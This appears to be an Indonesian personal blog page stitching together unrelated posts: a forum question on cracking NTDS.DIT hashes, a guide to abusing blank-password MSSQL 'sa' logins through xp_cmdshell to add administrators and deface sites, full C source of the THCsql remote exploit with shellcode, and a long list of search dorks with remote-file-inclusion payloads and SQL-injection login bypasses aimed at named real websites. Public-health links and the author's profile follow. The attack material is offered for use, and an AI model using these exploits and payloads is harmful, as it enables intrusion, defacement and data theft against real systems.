Spiga

Nyoba SumpDump.exe

http://www.insidepro.com/download/samdump.exe

I am cracking a password file for a client, and have a copy of the NTDS.DIT

file from a domain controller (win2k/Active Directory). We do not haveaccess to L0phtcrack currently, and I'm on a deadline. I was going to useJohn the Ripper with some plugins written by 3rd parties to crack thepassword file, but apparently the NTDS.DIT file isn't really a hashed filethat John can read After some research, I found that you can use PWDUMP2 to actually export theuser/pw information on the DC to a hashed file that you can then crack withJohn (even if syskey is used after SP2).

However, in order for PWDUMP towork, you have to run it as an administrator from the DC itself, where itinjects its own .dll into the lsass.exe process, which I no longer haveaccess to.

My question is this: Does anyone know if there is a way to extract the user/pw information fromthe NTDS.DIT file (rather than from lsass.exe on the server) into a hashedfile that I can then crack with John? If not, does anyone have any other suggestions on what I can do with thisNTDS.DIT file to crack it?


SQL Server Bugs

Bagi Anda orang IT pasti sudah tidak asing lagi mendengar nama Microsoft SQL Server. Produk RDBMS terkenal buatan Microsoft ini memang sangat banyak dipakai di seluruh dunia oleh perusahaan-perusahaan untuk menyimpan informasi dan aset digital mereka. Banyak yang menggantungkan nasib perusahaan pada sang SQL Server.

Namun kesalahan konfigurasi atau miskonfigurasi dari SQL Server bisa menyebabkan suatu keadaan yang fatal bagi sistem database dan bahkan mengakibatkan efek yang berbahaya bagi sistem komputer tempat SQL Server diinstall. Bisa hapus file dan shutdown sistem lho hueheheh ;)

Sebelumnya penulis perlu menjelaskan bahwa artikel ini tidak mempunyai maksud tertentu selain untuk ilmu pengetahuan dan kebebasan dalam berbagi ilmu pengetahuan. Penulis tidak bertanggung jawab apapun terhadap segala sesuatu yang terjadi akibat artikel ini. Artikel ini bersifat terbuka yang berarti Anda bisa memberikan kritik dan saran terhadap artikel ini melalui article@aritechdev.com.

Anda dilarang keras mengutip sebagian atau seluruh artikel ini tanpa sepengetahuan penulis. SQL Server yang akan kita bahas disini menggunakan SQL Server 7 atau bisa juga versi 2000 nya. SQL Server 7 memberikan dua jenis autentikasi untuk mengakses server database yaitu: 1. Windows NT Authentication Mode 2. Mixed Mode Jika Anda menginstall SQL Server dengan menggunakan Windows NT Authentication Mode maka secara otomatis login ke SQL Server akan mengikuti login Windows NT dan user dari Windows NT sajalah yang berhak untuk mengakses SQL Server.

Jika SQL Server diinstall pada Mixed Mode maka setiap user yang login ke SQL Server bisa diautentikasi oleh Windows NT atau oleh SQL Server itu sendiri. User login yang diautentikasi oleh SQL Server harus memberikan username dan password yang dimaintenance sendiri oleh SQL Server dan ini merupakan salah satu awal bencana. Ketika Anda menginstall SQL Server pada Mixed Mode maka secara otomatis SQL Server memiliki default account SA (system administrator) dengan password kosong (blank password).

Jika Anda login dengan account "sa" ini maka Anda sudah memiliki hak akses sangat luar biasa terhadap SQL Server yang meliputi semua database, tabel, stored procedure, security dan bahkan secara sadar atau tidak Anda juga otomatis memiliki akses besar ke sistem komputer tempat SQL Server diinstall. Menurut pengamatan penulis dilapangan menunjukkan bahwa masih sangat banyak sekali SQL Server baik yang bersifat production server atau experiment server yang ternyata belum dikonfigurasi dengan benar. Salah satu contoh miskonfigurasi di SQL Server ya seperti yang sudah disebutkan diatas, yaitu DBA nya lupa memberi password untuk account "sa" dan SQL Server diinstall pada Mixed Mode.

SQL Server memiliki extended stored procedure xp_cmdshell yang sangat mematikan. xp_cmdshell ini bisa menjalankan perintah shell pada SQL Server seperti jika Anda mengetikkan perintah-perintah shell pada layar console Windows NT. xp_cmdshell ini berada pada database master dan ini juga harus diatur hak pemakaiannya atau jika memang tidak perlu bisa dihapus. Tulisan mengenai SQL Server security check list akan disampaikan pada kesempatan yang lain. Oh ya, SQL Server bisa diakses oleh berbagai protokol seperti Named Pipe Net-Library atau melalui TCP/IP. SQL Server melalui TCP/IP akan membuka port 1433. Para pembaca mungkin masih ada yang bingung mengenai bencana apa saja akibat miskonfigurasi diatas.

OK, penulis akan memberi contoh beberapa bencana yang mungkin terjadi jika Anda sudah bisa login ke SQL Server sebagai user "sa":

1. Bisa membuat user pada Windows NT dengan level sekelas Administrator. Ini bisa dicapai dengan cara mengeksekusi command seperti berikut pada SQL Server use master xp_cmdshell 'net user adminbaru admin /add' go xp_cmdshell 'net localgroup Administrators adminbaru /add' go Dengan perintah diatas maka Anda membuat user adminbaru dengan password admin pada Windows NT dan sekaligus menjadikannya sekelas Administrator.

2. Bisa men-start atau men-stop service pada Windows NT Ini bisa dilakukan dengan perintah net start atau net stop, contoh berikut adalah untuk men-stop service HTTP pada Windows NT yang berakibat matinya web server :) use master xp_cmdshell 'net stop w3svc' go

3. Bisa membuat FTP script untuk melakukan suatu download file dari server lain.

4. Bisa digunakan untuk men-deface website ;) Nah kalo yang ini mungkin banyak yang suka ;) Karena men-deface lewat SQL Server jauh lebih mudah daripada lewat bug unicode. Kalo pada bug unicode kita masuk ke sistem sesuai denganhak akses dari user IUSR_MACHINENAME, maka jika kita masuk ke sistem dengan SQL Server maka kita akan masuk dengan hak akses LocalSystem sehingga kita bisa melakukan apa saja di server, termasuk bisa men-shutdown sistem kalo mau :) Tulisan mengenai mendeface website dengan SQL Server akan penulis sajikan pada kesempatan lain.

5. Bisa untuk mass-defacing, ah masak? Lho iya, penulis sendiri pernah masuk ke host SQL Server yang kebetulan adalah milik suatu perusahaan web hosting di Israel dan kebetulan didalamnya terdapat puluhan wwwroot untuk beberapa domain yang berbeda. Tinggal copy aja file kita ke masing-masing folder tadi, jadilah sudah mass defacing yang ternyata cuman masuk ke satu host saja huehehe ;)

6. Bisa mengakses registry windows yang berakibat dengan mengambil password Windows NT atau juga membuat key dan value pada registry. Demikian beberapa bencana yang dapat menimpa sistem Windows NT yang terdapat SQL Server yang belum dikonfigurasi dengan benar. Sebenarnya masih banyak lagi bencana-bencana lain yang dapat muncul dan itu memang tergantung dari imajinasi Anda para hacker Semakin Anda mengerti dan menguasai suatu sistem maka semakin banyak pula trik dan kemampuan Anda untuk mengeksploitasi sistem.

Jika Anda berminat untuk mencoba maka sekarang mulai saja men-scan host yang port 1433 nya terbuka dan jika sudah menemukan host yang port 1433 nya terbuka cobalah akses kesana dengan menggunakan program Query Analyzer atau Anda juga bisa menggunakan SQL Server query dalam mode dos yaitu isql.exe.

Jika Anda ingin mencobanya dengan ISQL maka coba ajah ketikkan perintah berikut untuk login ke SQL Server dari command prompt: C:>isql -S targethost -U sa Kemudian tekan enter, dan akan muncul inputan password, terus tekan enter saja.

Jika host tersebut masih menggunakan password blank maka akan muncul SQL prompt seperti dibawah 1> Pada prompt tersebut Anda bisa mengetikan perintah SQL anda, misalnya seperti dibawah 1>select * from sysusers 2>go OK, akhirnya penulis berpesan bahwa jaga baik-baik SQL Server Anda, jangan lupa untuk mengisi password pada account "sa" (account "sa" tidak bisa di-rename atau dihapus).

Sebenarnya masih banyak lagi yang harus diperhatikan pada SQL Server daripada sekedar mengganti password account "sa", tetapi dengan begitu saja sudah meminimalkan intrusion pada sistem Anda. Terimakasih, mission complete.


Source code Exploit MSSQL


#include
#include
#include
#include

char badbuffer[] =
"\x04"
"THCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHC"
"THCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHC"
"\xdc\xc9\xb0\x42"
"\xeb\x0e"
"JC"
"THC!"
"\x01\x70\xae\x42"
"\x01\x70\xae\x42"
"\x8b\xfc\x83\xc7\x2c\x66\x81\xec\x04\x02\x33\xc9\xb2\x35\x66"
"\x81\xc1\x38\x01\x8a\x1f\x32\xda\x88\x1f\x47\xe2\xf7\xde\x16"
"\x4f\x5c\x37\x30\x59\x6c\xcd\x28\xa9\xeb\xb9\xe4\x79\x45\xe1"
"\x36\xc5\x12\x15\x15\x05\x3d\x62\x66\x07\x6a\x06\x07\x1b\x71"
"\x79\x79\x34\xde\x30\xdd\xcc\xca\xca\xca\x68\xb6\xd8\x1f\x5f"
"\x05\x6c\x51\xbe\x34\xbe\x75\x39\xbe\x45\x29\x98\xbe\x4d\x3d"
"\xb8\x6a\x09\xbe\x2e\x34\xce\xbe\x6e\x4d\x34\xce\xbe\x7e\x29"
"\x34\xcc\xbe\x66\x11\x34\xcf\x66\x64\x67\xbe\x6e\x15\x34\xce"
"\x04\xfc\x74\x04\xf5\xac\xbe\x01\xbe\x34\xcb\x99\x04\xf7\xe4"
"\xd7\xb1\xf5\x40\xc2\x3a\x83\x70\x30\xb8\x71\x70\x31\x53\x0c"
"\x25\x40\xd4\x53\x04\x25\x6f\x6d\x6b\x63\x65\x67\x1e\x7b\x25"
"\x74\x3a\x82\x39\x7f\xbe\x31\xbd\x34\xcd\x3a\x83\x78\x30\xbc"
"\x71\xb8\xed\xcb\x78\x30\x40\x8b\xcb\x78\x31\x41\x14\xcb\x78"
"\x17\xb8\x68\x2d\x66\xca\xe5\xbc\xf2\x5f\x31\x6d\xbd\x70\x30"
"\xb5\x70\x42\x3f\xb8\x68\x41\xb5\x5e\x13\x21\xdc\x4d\xca\xca"
"\xca\xbc\xfb\x04\xee\x66\x66\x66\x66\x63\x73\x63\xca\xe5\xa2"
"\x60\x6d\x53\xbc\x05\x5f\x25\x60\x62\xca\x60\xe1\x7b\x63\x62"
"\xca\x60\xf9\x66\x60\x62\xca\x60\xe5\xa2\xb8\x70\xbd\x65\xca"
"\x60\xd1\x60\x60\xca\x60\xdd\xb8\x71\x30\x39\xa1\x66\x5d\x1b"
"\x50\x4d\x50\x5d\x69\x56\x58\x51\xa1\x04\xe7\xb8\x70\xf9\xa1"
"\x62\x62\x62\x66\x66\xcb\xf3\x34\xc7\x67\xa1\xb8\x70\x4d\x65"
"\xb8\x70\xbd\x65\x84\x3d\x66\x66\x5f\x25\xcb\xfb\x67\x66\x66"
"\x66\x60\xca\x60\xd9\x5f\xca\xca\x60\xd5";

void usage();

int main(int argc, char *argv[])
{
unsigned short sqlport=1434;
unsigned int sock,addr,rc;
struct sockaddr_in sqludp;
struct hostent * hp;
WSADATA wsaData;

printf("\nTHCsql v0.1 - Wind0wZ remote root sploit for MSSQL-Servers < SP3\n");
printf("by Johnny Cyberpunk (jcyberpunk@thehackerschoice.com)\n");
printf("bug was found by David Litchfield\n");

if(argc<2)
usage();

if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0)
{
printf("WSAStartup failed !\n");
exit(-1);
}

hp = gethostbyname(argv[1]);

if (!hp){
addr = inet_addr(argv[1]);
}
if ((!hp) && (addr == INADDR_NONE) )
{
printf("Unable to resolve %s\n",argv[1]);
exit(-1);
}

sock=socket(AF_INET,SOCK_DGRAM,IPPROTO_UDP);
if (!sock)
{
printf("socket() error...\n");
exit(-1);
}

if (hp != NULL)
memcpy(&(sqludp.sin_addr),hp->h_addr,hp->h_length);
else
sqludp.sin_addr.s_addr = addr;

if (hp)
sqludp.sin_family = hp->h_addrtype;
else
sqludp.sin_family = AF_INET;

sqludp.sin_port=htons(sqlport);

rc=connect(sock, (struct sockaddr *) &sqludp, sizeof (struct sockaddr_in));
if(rc==0)
{
send(sock,badbuffer,sizeof(badbuffer)-1,0);
printf("\nexploit send .... sleeping a while ....\n");
Sleep(1000);
printf("\nok ... now try to connect to port 31337 via netcat !\n");
}
else
printf("can't connect to sql port udp 1434!\n");

shutdown(sock,1);
closesocket(sock);
exit(0);
}

void usage()
{
unsigned int a;
printf("\nUsage: \n");
exit(0);

SQL inject, bugs and....

Wow klo yang nge bahas ini kayaknya ngga ada abisnya soalnya uptodate tiap menit bahkan detik siapa tuh yang update yahh para hacker didunia ini.trus penulis disini TIDAK bertanggung jawab atas apa yang telah dilakukan oleh Pelakunya penulis hanya sekedar menulis untuk kepentingan SECURITY(bahasa Gaulnya). NGGA BERTANGGUNG JAWAB ATAS PENYALAHGUNAAN TULISAN INI.titik

Pembahasan:
SEMUA INI DARI SABEN ----->
------------------------------------------------
keyword:inurl:"/cart.php?m="
contoh:http://www.facesbyfelicia.com/store/cart.php?m=view
ganti tulisn cart.php?m=view dengan admin
jadi http://www.facesbyfelicia.com/store/admin
trus login pake sql username : 'or"=" password :'or"="
------------------------------------------------
keyword inurl:"/modernbill"
contoh:http://billing.ourweb.net/modernbill/
masukin injekannya:include/html/config.php?DIR=http://one-server.us/injek.txt?
jadi:http://billing.ourweb.net/modernbill/include/html/config.php?DIR=http://one-server.us/injek.txt?
------------------------------------------------
keyword:"Powered by SunShop 3.2" atau: inurl:"/sunshop/index.php?action="
contoh http://www.dohertysgym.com/sunshop/index.php
ganti kata index.php dengan admin jadi : http://www.dohertysgym.com/sunshop/admin
login pake user: admin pass: 'or''='
------------------------------------------------
inurl:"modules.php?name=SQuery"
injek:SQuery/lib/gore.php?libpath=http://one-server.us/item.txt?
contoh:http://www.dies-world.com/SQuery/lib/gore.php?libpath=http://one-server.us/item.txt?
------------------------------------------------
google:allinurl:com_galleria
injek:components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://one-server.us/item.txt?
contoh:http://www.a1gpracing.net/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://coffee-pot.info/injek.txt?
------------------------------------------------
google:allinurl:"/auth/lostPassword.php"
contoh:http://www.kbsbrig.ch/claroline/claroline/auth/lostPassword.php
injek:ldap/authldap.php?includePath=http://one-server.us/item.txt?
jadi:http://www.kbsbrig.ch/claroline/claroline/auth/ldap/authldap.php?includePath=http://one-server.us/item.txt
------------------------------------------------
google:intitle:"Multimedia Flash Website Builder"
contoh:www.webdesignhq.com/sitebuilder/index.php
injek:sitebuilder/admin/top.php?admindir=http://one-server.us/item.txt?
jadi:www.webdesignhq.com/sitebuilder/admin/top.php?admindir=http://one-server.us/item.txt?
------------------------------------------------
gogle:"software 2004-2005 by randshop"
contoh:http://www.dieterkropp.com/shop/themes/kategorie/index.php?id=20&katid=32&action=detail
injek:includes/header.inc.php?dateiPfad=http://one-server.us/item.txt?
jadi:http://www.dieterkropp.com/shop/includes/header.inc.php?dateiPfad=http://one-server.us/item.txt?
------------------------------------------------
keyword;"powered by geeklog"
contoh:http://www.kobe-ch.com/index.php
injek:plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://geocities.com/shella_kapas/kek.jpg?
jadi:http://www.kobe-ch.com/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://geocities.com/shella_kapas/kek.jpg?
------------------------------------------------
google:inurl:"/product.php?printable=" atau "powered by x-cart"
inurl:"/home.php?printable=" ganti tulisan itu semua dengan admin
kekekek biasa sqlnya cari sendiri ya
------------------------------------------------
keyword:inurl:"/index. php?option=com_rsgallery"
bug:components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://elang13.org/item,txt?
contoh:http://www.pass-my-shotgun.co.uk/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://elang13.org/item.txt?
------------------------------------------------
keyword:"Advanced Poll" inurl:/admin/
contoh:http://www.kgcshop.or.kr/shop/admin/poll/admin/index.php
bug:common.inc.php?base_path=http://elang13.org/item.txt?
jadi:http://www.kgcshop.or.kr/shop/admin/poll/admin/common.inc.php?base_path=http://elang13.org/item.txt?
------------------------------------------------
inurl:"powered by cs-cart"
injek:classes/phpmailer/class.cs_phpmailer.php?classes_dir=http://elang13.org/item/txt?
------------------------------------------------
inurl:"/catalogue.php?cat="
ganti tulisan catalogue.php?cat= dengan admin selanjutnya tguas ente ente sekalian nyari sqlnya hak hak hak

inurl:"/DoceboScs" injek:doceboScs/lib/lib.teleskill.php?GLOBALS[where_scs]=http://elang13.org/hitam.txt?
inurl:"/DoceboCore" injek:doceboCore/lib/lib.php?GLOBALS[where_framework]=http://elang13.org/hitam.txt?
inurl:"/DoceboLms" injek:doceboLms/lib/lib.repo.php?GLOBALS[where_framework]=http://elang13.org/hitam.txt?
inurl:"/DoceboKms" injek:doceboKms/modules/documents/lib.filelist.php?GLOBALS[where_framework]=http://elang13.org/hitam.txt?
inurl:"/DoceboCMS" injek:docebocms/lib/lib.simplesel.php?GLOBALS[where_framework]=http://elang13.org/hitam.txt?
------------------------------------------------
allinurl:"dload.php"
injekan:pafiledb/includes/pafiledb_constants.php?module_root_path=http://elang13.org/hitam.txt?
------------------------------------------------
"powered by squirrelcart"
injek : squirrelcart/cart_content.php?cart_isp_root=
------------------------------------------------
keyword inurl:/ubbthreads/
injek:addpost_newpoll.php?addpoll=preview&thispath=http://elang13.org/hitam.txt?
------------------------------------------------
allinurl:"index.php?target=categories"
injek:classes/phpmailer/class.cs_phpmailer.php?classes_dir=http://elang13.org/item.txt?
------------------------------------------------
google : "Exhibit Engine 1.5 RC 4"
injek:photo_comment.php?toroot=http://elang13.org/item.txt?
------------------------------------------------
inurl:"/modules/Forums/
injek:admin/admin_users.php?phpbb_root_path=http://elang13.org/item.txt?
------------------------------------------------
allinurl: includes/include_once.php
bug:includes/include_once.php?include_file=http://elang13.org/item.txt?
------------------------------------------------
allinurl:/phplivehelper/blank.php
injek:initiate.php?abs_path=hhttp://elang13.org/item.txt?
------------------------------------------------
google:"powered by DreamAccount"
injeknya:
auth.cookie.inc.php?da_path=http://elang13.org/item.txt?
auth.header.inc.php?da_path=http://elang13.org/item.txt?
auth.sessions.inc.php?da_path=http://elang13.org/item.txt?
------------------------------------------------
ashopKart20/" ganti tulisan yang ada didepannya ama admin/scart.mdb
------------------------------------------------
inurl:"//comersus/" ganti /store/xxxx.asp dengan
database/comersus.mdb
------------------------------------------------
allinurl:/shop/category.asp/catid=
hapus tuisan /shop/category.asp?catid=2 ganti dengan /admin/dbsetup.asp liat file mdbnya donlot uka pake microsoft acsses ccnya biasayanya di encrypt
http://rossm.net/Electronics/Computers/Software/ASP/RC4.asp
------------------------------------------------
inurl:"/admin/default.asp"
username:admin password:'or''='
span style="color: rgb(51, 51, 255);">------------------------------------------------
inurl:"/metacart/"
injek : database/metacart.mdb
------------------------------------------------
inurl:"/store/proddetail.asp?prod="
ganti tulisan proddetail.asp?prod= dengan fpdb/vsproducts.mdb
------------------------------------------------
inurl:"/AdminLogin.asp"
login pake sql ini :
usename:1'or'1'='1
password:1'or'1'='1
------------------------------------------------
inurl:"com_a6mambocredits"
http://www.targer.com/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://Senjata.com/tembuspakeshell.txt
------------------------------------------------
"Welcome to phpMyAdmin" inurl:main.php
------------------------------------------------
filetype:sql ("passwd values ****" | "password values ****" | "pass values ****" )
------------------------------------------------
inurl:"com_peoplebook"
inurl:"com_comprofiler"

:: funniest pict ::

No

Topik

Links

1

Kesehatan lingkungan

www.pascaunhas.net/alumni/kesmas.pdf

2

Kajian Epidemiologi rawan KLB

www.ampl.or.id/admin/pdf/seminar/lokakarya_data/Presentasi_Materi_Pokja_Banten_2.pdf

3

Kesling

www.journal.unair.ac.id/filerPDF/KESLING-1-2-06.pdf

4

Metode Kontrasepsi

www.fkm.unair.ac.id/metode%20kontrasepsi%20(PIK).pdf

5

Monitoring dan evaluasi pelaksanaan jaring pengaman sosial


www.fiskal.depkeu.go.id/webbkf/kajian%5C05DAMPAK%20SOSIAL,%20EKONOMI%20DAN%20EVALUASI-Arti%20Dyah.pdf

6

Kesehatan Reproduksi

www.ditplb.or.id/2007/files/Makalah_Kespro_Solo.doc

www.hesp.or.id/files/linkages/HUBUNGAN%20KESPRO%20KEPENDUDUKAN%20PEMBANGUNAN.doc

7

Situasi kesehatan dan gizi

www.gizi.net/lain/download/SKG-1.doc

8

Sinergisme Dunia Kesehatan

www.angelinasondakh.com/Articles/Education/Home%20Schooling/Realitas%20Kesehatan%20dan%20Perspektif%20UU.doc

9

Jaminan pemeliharaan kesehatan masyarakt

elearning.unej.ac.id/courses/DOLLIS/document/JPKM.doc?cidReq=DOLLIS

10

Pelaksanaan K3 disarana Kesehatan

www.depkes.go.id/downloads/onedayk3.doc

11

Perda K3

www.darulhikam.com/artikel/perda%20k3.doc

12

Penerapan kesehatan dan keselamatan kerja (k3)


prasaranajalan-sumbar.go.id/info/berita/20060928001/paperK3kelok9.doc

13

Tutorial SPSS

blog-indonesia.com/.../english/tsite/hprlnks_inparametric_dot_com_slsh_bhinablog_slsh_archives_slsh_74 - 12k

14

Kebeijakan Operasional keperawatan kesehatan masyarakat

www.pelkesi.or.id/dokumen/Penerapan%20Kebijakan%20Upaya%20Keperawatan%20Kes%20Mas.pdf

15

Jurnal manajemen pelayanan kesehatan

www.jmpk-online.net/

16

Jurnal terakreditasi

puslit.petra.ac.id/regulations/jurnal.htm

17

Pusat data jurnal dan skripsi

www.fkm-undip.or.id/data/index.php?action=1&start=975 - 26k

18

Jurnal promosi kesehatan

blog.pengusahaonline.com/po/kesehatan/jurnal-kesehatan.php

19

Jurnal gizi kesehatan masyarakat

www.ijcn.or.id/index.php?option=com_content&task=view&id=12&Itemid=1 - 16k



No

Topik

Links / website

1

Manajemen sampah

www.jala-sampah.or.id/

2

Seminar nasional pencemaran

www.its.ac.id/berita.php?nomer=2977 - 12k

3

Survey gizi di riau

www.riau.go.id/index.php?module=articles&func=display&ptid=1&aid=2792 - 30k

4

Survey garam beryodium

www.gizi.net/gaky/lap-garam-2000.shtml

5

Survey konsumsi pangan

library.usu.ac.id/modules.php?op=modload&name=Downloads&file=index&req=getit&lid=880

6

Puskesmas

www.depkes.go.id/index.php?option=news&task=viewarticle&sid=2390&Itemid=2 - 19

7

Penyakit menular

www.penyakitmenular.info/

8

Penyakit menular seksual

hqweb01.bkkbn.go.id/hqweb/ceria/pengelolaceria/pp3pms.html - 38k

9

Memerangi HIV/AIDS, Malaria, dan Penyakit Menular Lainnya

www.bappenas.go.id/.../&view=8/IndonesiaMDG_BI_Goal6.pdf

10

Psikologi pada lansia

www.e-psikologi.com/usia/160402.htm - 56k

11

K3 perusahaan

members.bumn.go.id/pelabuhan1/news.html?news_id=17286 - 17k

12

Administrasi kebijakan kesehatan

www.mikm-undip.or.id/akk/index_heading.htm

13

Dll

www.google.com

:: selamat datang di blog pribadi ku::
Ade cahya Nama gw Terlahir di Tasik malaya 30 Desember 1983 di bawah naungan bintang capricorn. Gue lahir di hari minggu disebuah desa Cimerah lahir emang di tanah jawa tapi gua besar di sumatra,nah waktu gua umur baru sebulan babeh dah ngajakin jalan-jalan ke bengkulu ikutan transmigrasi .Disana gua tinggal kira kira 6 tahunan lah.

Trus babeh ngajakin balik ke jawa lagi kangen kali ama kampung halaman,tapi itu cuma bertahan selama beberapa bulan karna bonyok ngajakin petualang lagi ke Riau tepatnya di Lipat kain disana gue cuma 2 tahunan tapi gua sempet sekolah ampe kelas dua sed terus balik lagi deh ke tasik nah baru deh gua nyampe di bangkinang.

Di Bangkinang gua tinggal di desa Sibuak namanya ampe sekarang nich. so intinya gua ini adalah petualang sejati dech.

sekarang gua lagi ngelanjutin kuliah di bidang IT yaitu manajemen informatika komputer di akademi mahaputera Riau yah mudah-mudahan gue bisa ngelanjutin ke yang lebih tinggi geeeeeeeto

oh gue punya saudara laki-laki 5 dan satu saudara cewek end bokap gue orang sunda asli dari tasik end myokap gue dari pasuruan dan Gw berdo'a semoga Allah memberikan umur yang panjang kepada keduanya Amien.

identitas gua :

Nama
:
udah ada noh di atas
Alamat
:
gua di sibuak petapahan riau
Email
:
gondjez@gmail.com
mobile
:
0856 678 3401
Campus
:
akademi mahaputera riau jl.Paus no 19 A-C www.mahaputera.ac.id
kost
:
jl.Nangka Gg Sabar No.10 H (itu kalo gua blm pindah)
jekel
:
Masih seperti yg dulu (Pria tulen perjaka)
footbal club
:
Juventus pemain : R.Carlos (gak nyambung ya )
Tokoh
:
Ibnu sina
Gebetan
:
Belum ada Yg Nggebet nich